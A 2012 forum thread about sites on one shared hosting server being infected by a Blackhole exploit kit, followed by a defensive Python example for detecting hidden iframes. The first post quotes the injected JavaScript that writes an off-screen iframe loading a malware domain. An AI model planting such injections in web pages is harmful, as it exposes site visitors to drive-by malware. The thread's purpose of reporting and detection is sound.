> Sites hosting with Exabytes got hacked?, Exabytes Customer Please Come In

TSxDragonZ
post Jul 19 2012, 11:16 AM, updated 9y ago

On my way
****
Senior Member
538 posts

Joined: Jul 2008
From: Just behind you !

These few days I saw my website asking me to run Java or download a PDF file.

Let's cut the story short...
After some investigation I noticed that the site is infected with the "RedKit exploit kit / BlackHole exploit kit".

So what I did was get all the domains hosted under the "sphinx" / 110.4.40.109 server and do some scans, and even other sites hosted under Exabytes were infected. (See below for a list of some infected sites.)


So did the hackers upload the exploit to my files, or...?


It will inject something like this :

CODE
document.write('<style>.c0a8xe { position:absolute; left:-1401px; top:-1633px} </style> <div class="c0a8xe"><iframe src="http://fhrybregf.tk/25644443.html" width="469" height="221"></iframe></div>');


and it will appear randomly inside any .js files and even .php and even .html files (I can't even find it in the source code). I also checked that my .js file is CHMODed to 644, not 777. I assume it injects the malware code on the fly and then sends it to the user.

I did a scan on http://sitecheck.sucuri.net/scanner/ too, and a warning comes out.

And this BlackHole exploit is clever: it will not show to some users, but you can use sites like http://www.webpagetest.org or http://jsunpack.jeek.org/joomla/ to check using different locations and browsers.


The source code of the target (malware) site:
http://pastebin.com/sCBNJih5 (found on my site)
http://pastebin.com/nPU1WCDV (unknown user posted this)

Read:
http://www.avgthreatlabs.com/webthreats/in...le-exploit-kit/
http://www.symantec.com/connect/blogs/blackhole-theory
http://www.symantec.com/connect/blogs/blac...-random-domains
http://stopmalvertising.com/malware-report...ploit-kits.html
Google "Blackhole exploit kit"


NOTE: I DID NOT SAY Exabytes got hacked or anything. I just can't figure out why some other sites hosted under the same IP got infected as well:

What they told me is this:
QUOTE
From my checking the server is fine. As this is a shared hosting server, there might be other users being attacked if their account is not secure. However, it attacks based on account; it will not affect other accounts. We do inform users on this and help to secure their site if any account is found being attacked.



Here's the list of websites under the same IP (please look at the IP or .tk domain for the malware):
jefferson.com.my
http://jsunpack.jeek.org/?report=edffe0129...5a83da4680332b1
thundermatch.com.my
http://www.webpagetest.org/result/120719_RX_D4H/1/details/
chinwell.com.my
http://www.webpagetest.org/result/120719_T2_3JP/1/details/
mom2ashley.com
http://www.webpagetest.org/result/120718_0G_JAH/1/details/
freshm2m.com
http://www.webpagetest.org/result/120718_Q6_JDQ/1/details/
smkttdi.edu.my
http://www.webpagetest.org/result/120718_DE_K17/1/details/
islamic-world.net
http://jsunpack.jeek.org/joomla/?report=fb...23bdc939ebe080d
bent.com.my
http://www.webpagetest.org/result/120719_4K_D3G/1/details/
aiodot.com
http://www.webpagetest.org/result/120719_NM_D37/1/details/
celles.com
http://www.webpagetest.org/result/120719_5F_D6W/1/details/
malaysiasme.com.my
http://jsunpack.jeek.org/?report=475d5e036...f2e07c6e04462fc
http://www.webpagetest.org/result/120719_JJ_DZG/1/details/

http://www.webpagetest.org/result/120718_TJ_HRQ/1/details/
http://jsunpack.jeek.org/joomla/?report=78...78ae87ec5017dd9
http://wepawet.iseclab.org/view.php?hash=a...2701239&type=js

and there's more!



Exabytes is really slow in replying to my tickets.


This post has been edited by xDragonZ: Jul 19 2012, 08:49 PM
iWill
post Jul 19 2012, 11:23 AM

Enthusiast
*****
Senior Member
879 posts

Joined: Jan 2011
From: iWill.com.my
Hmmm... Thank you for sharing this. I hope it's not widespread. I have sites on their server.

Let us know what they say when you get the reply.

This post has been edited by iWill: Jul 19 2012, 11:23 AM
wanakev2
post Jul 19 2012, 01:43 PM

Getting Started
**
Junior Member
142 posts

Joined: May 2010
Oh my, very shocking news..

I thought only budget web hosting always got hacked. =(

Thanks for sharing the info.
TSxDragonZ
post Jul 19 2012, 06:47 PM

On my way
****
Senior Member
538 posts

Joined: Jul 2008
From: Just behind you !

Update:

I asked my host to remove all my public_html files and I uploaded a simple index.php, and the webpage is still infected. (I checked that the source code on the server is 100% untouched and clean), but it is reported to contain another iframe. (I also tried loading the page on another computer; it contains a hidden iframe that you need a tool like "Inspect Element" in Google Chrome to find.)

http://www.webpagetest.org/result/120719_YY_CEZ/1/details/

This post has been edited by xDragonZ: Jul 19 2012, 08:50 PM
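The two checks the thread does by hand (spotting the off-screen div + iframe that the first post pasted, and comparing a clean index.php on disk against what the browser actually receives, as in the update above) can be scripted. The following is an added example written for this page, not code from the poster or from Exabytes; the HTML, the injected line and the iframe host `injected.example` are constructed placeholders standing in for the real page and the real .tk domain.

```python
import difflib
import re

# Constructed sample (not from the forum post): the file as uploaded to public_html,
# and the response a visitor's browser actually received.
ON_DISK_INDEX = """<html><head><title>Test site</title></head>
<body>
<h1>Hello</h1>
<script src="/js/site.js"></script>
</body></html>
"""

# Same file as served, with one extra line in the style the thread describes
# (off-screen div wrapping an iframe, written via document.write).
# The iframe URL is a constructed placeholder, not the real host.
SERVED_INDEX = ON_DISK_INDEX.replace(
    "<body>\n",
    "<body>\n"
    "<script>document.write('<style>.c0a8xe { position:absolute; left:-1401px; top:-1633px} </style> "
    "<div class=\"c0a8xe\"><iframe src=\"http://injected.example/25644443.html\" "
    "width=\"469\" height=\"221\"></iframe></div>');</script>\n",
)

# CSS that pushes an element far off-screen or hides it outright.  Going a little beyond
# the thread's sample, display:none and visibility:hidden are treated the same way.
HIDDEN_CSS_RE = re.compile(
    r"(?:left|top)\s*:\s*-\d{3,}px|display\s*:\s*none|visibility\s*:\s*hidden", re.I
)
# iframe src, tolerating a backslash-escaped quote when the tag sits inside a JS string.
IFRAME_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*\\?["\']([^"\'\\]+)', re.I)


def find_hidden_iframes(content: str) -> list[str]:
    """Return the src of every iframe in content when hiding CSS is also present.

    Works on HTML, on a .js file and on a document.write() payload alike, because it
    scans the raw text instead of parsing a DOM (the payload is only a string literal
    until the browser executes it).
    """
    if not HIDDEN_CSS_RE.search(content):
        return []
    return [m.group(1) for m in IFRAME_RE.finditer(content)]


def injected_lines(on_disk: str, served: str) -> list[str]:
    """Lines in the served response that do not exist in the file on disk."""
    diff = difflib.unified_diff(
        on_disk.splitlines(), served.splitlines(), lineterm="", n=0
    )
    return [ln[1:] for ln in diff if ln.startswith("+") and not ln.startswith("+++")]


def assess(on_disk: str, served: str) -> dict:
    """Combine both checks into one verdict for a single page."""
    added = injected_lines(on_disk, served)
    iframes = find_hidden_iframes(served)
    return {
        "injected_lines": added,
        "hidden_iframes": iframes,
        # Content absent on disk but present in the response, with a hidden iframe in it,
        # points at the serving layer (web server, PHP setup, .htaccess) rather than at
        # the uploaded files, which is exactly what a clean index.php still being
        # flagged suggests.
        "serve_time_injection": bool(added)
        and bool(iframes)
        and not find_hidden_iframes(on_disk),
    }


if __name__ == "__main__":
    for key, value in assess(ON_DISK_INDEX, SERVED_INDEX).items():
        print(key, value)
```

In practice `on_disk` would be read from the account via SFTP and `served` fetched over HTTP from a couple of different networks and User-Agents, since the thread notes the kit does not serve the iframe to every visitor; a fetch that shows no added lines from one vantage point does not clear the site.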
soundsyst64
post Jul 19 2012, 07:28 PM

I'm No-Longer-Noobs
*******
Senior Member
3,725 posts

Joined: Jul 2005
From: In /hardware/

Hacking can go through a Joomla/WordPress exploit or a weak FTP/cPanel password.
